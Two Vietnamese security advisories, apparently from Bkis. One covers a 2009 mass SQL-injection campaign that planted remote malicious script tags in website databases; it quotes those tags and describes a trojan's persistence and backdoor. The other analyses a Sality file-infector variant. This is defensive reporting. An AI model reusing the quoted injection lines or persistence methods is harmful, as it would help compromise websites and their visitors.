Ngày 13/12/2009 một đợt tấn công SQL Injection hàng loạt mới đã được phát hiện. Ở thời điểm cao trào, có tới trên 187.000 website đã bị tấn công.

Ảnh kết quả tìm kiếm google

Các website này có cùng một đặc điểm đó là đều mắc lỗi SQL injection, database đã bị chèn thêm rất nhiều đoạn mã sau: <script src=http://wgwggg.cn:1/1.js></script>

Ảnh viewsource website có mã script

Khi người dùng thăm những website này đoạn script trên sẽ được thực thi và âm thầm tải về  các iframe ẩn chứa mã khai thác, từ đó download malware về máy tính người dùng.

Ảnh 1.js

Biểu đồ tấn công

Trang web sử dụng các mã khai thác của các lỗi:

Lỗ hổng tràn số nguyên trong Adobe Flash Player, được miêu tả trong CVE-2007-0071

Lỗ hổng MDAC ADODB.Connection ActiveX, được mô tả trong MS07-009

Các lỗ hổng Microsoft Office Web Components, được mô tả trong MS09-043

Lỗ hổng Microsoft video ActiveX, được mô tả trong MS09-032

Lỗ hổng Uninitialized Memory Corruption của Internet Explorer, được mô tả trong MS09-002.

Nếu khai thác thành công, file upload.css (W32.CSSExploit.Trojan) sẽ được âm thầm tải và cài đặt vào máy người dùng.

Virus W32.CSSExploit.Trojan có các đặc điểm sau:

1. 1. Xuất file : %UserProfile%\[RandomName].drv
2. 2. Copy bản thân thành file có tên “auto.exe” trong thư mục : %ProgramFiles%\Common Files\
3. 3. Ghi key :

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\auto]

Đăng kí service : DrvKiller

Để virus được chạy lên mỗi khi windows khởi động

1. 4. Copy bản thân, kèm theo file “autorun.inf” vào tất cả các ổ đĩa để phát tán.
2. 5. Sửa lại home page thành : http://www.playbo[removed]ing.com.cn:8788/
3. 6. Cài đặt backdoor, cho phép hacker kiểm soát máy tính từ xa.
4. 7. Download và thực thi rất nhiều virus game trực tuyến và các loại malware khác trên máy bị lây nhiễm.

Theo kết quả phân tích thì virus và đợt tấn công trên có vẻ như có nguồn gốc từ Trung Quốc.

Chúng tôi vẫn đang tiếp tục theo dõi và phân tích kỹ hơn về cuộc tấn công này.

Khuyến cáo:

-          Hiện nay vẫn còn rất nhiều website bị tấn công chưa được khắc phục, Quản trị của các website này cần nhanh chóng gỡ bỏ tất cả các đoạn script độc hại bị chèn vào database, sửa lại các lỗi SQL Injection của website để đề phòng những đợt tấn công tiếp theo.

-          Người dùng nên cập nhật Windows và bản vá cho các phần mềm. Ngoài ra, nếu đã bị nhiễm virus trên, có thể download Bkav tại đây để diệt.

Theo kết quả phân tích mới nhất của chúng tôi, hacker vừa tiêm một đoạn mã mới vào các website:

<scritp src = http://a.118cc.cn /script>

Bkis Security

Gần đây, một biến thể mới của Sality đã xuất hiện. Sality là một trong những virus lây file siêu đa hình hoạt động mạnh nhất từ trước đến nay.

Biến thể Sality mới này vẫn lây lan qua các ổ đĩa (local disk) và các ổ mạng, lây nhiễm và tạo bản sao của winmie.exe hoặc notepad.exe trong các ổ di động cùng với file autorun.inf để virus được kích hoạt. Tuy nhiên, thay vì kỹ thuật EPO (Entry Point Obscuring), biến thể mới này sử dụng phương pháp đơn giản hơn để chiếm quyền kiểm soát các file PE gốc. Cụ thể, virus thay thế lệnh ở Entry Point gốc bằng một lệnh Call (mã máy E8). Lệnh Call này sẽ chuyển điều khiển đến mã siêu đa hình của virus ở cuối file trước khi mã hóa phần thân của virus. Phần thân của virus, khi được kích hoạt, sẽ tìm kiếm thêm nạn nhân. Trong suốt quá trình này, nếu 1 file nào đó có tên trong blacklist của virus (hầu hết các tên trong bản “danh sách đen” này đều là tên của các công cụ an ninh), virus sẽ ghi đè lệnh ở điểm đầu của file bằng lệnh RET (mã máy C3), khiến các file này không thể hoạt động bình thường được.

Thêm vào đó, Sality cũng sử dụng nhiều cách khác nhau để bảo vệ chính mình, như tắt Windows Task Manager và Windows Registry Editor, hay tấn công ngược lại các chương trình diệt virus, làm cho Windows Security Center liên tục đưa ra cảnh báo, và ngăn cản người sử dụng chạy Windows trong Safe Mode. Virus cũng tải kernel driver và đăng ký chức năng lọc của mình với Windows IP Traffice Filter Driver. Khi đó, Sality sẽ có riêng 1 tường lửa để điều khiển truy cập vào Internet của người sử dụng, ngăn cản việc truy cập vào các website của các hãng phần mềm diệt virus. Bằng cách này, liên lạc giữa người sử dụng và các nhà sản xuất phần mềm diệt virus qua Internet không thể thực hiện được, các chương trình diệt virus không thể kết nối đến website của mình để cập nhật, người sử dụng không được hỗ trợ bởi các chuyên gia. Sality còn download và thực thi các mã độc khác trên máy tính của người sử dụng. Người dùng phải đối diện với nguy cơ bị mất các thông tin nhạy cảm mà không hề hay biết.

Quay trở lại vấn đề về kỹ thuật, các phiên bản cũ của Sality sử dụng thuật toán RC4 để mã hóa phần thân của mình, trong khi phiên bản mới nhất này lại sử dụng một cách thức hoàn toàn khác, phức tạp hơn. Rất khó để xác định chính xác lệnh nào được sử dụng cho việc giải mã phần thân của virus, lệnh nào chỉ là một mã rác, hay register nào chứa những giá trị có ích, register nào không. Các chương trình diệt virus sẽ phải làm việc cật lực hơn để thu thập đủ các tham số phục vụ cho việc giải mã và loại bỏ virus khỏi các file gốc.

Biến thể này của Sality được Bkav nhận diện là W32.SalityVI.PE.

Bkis R&D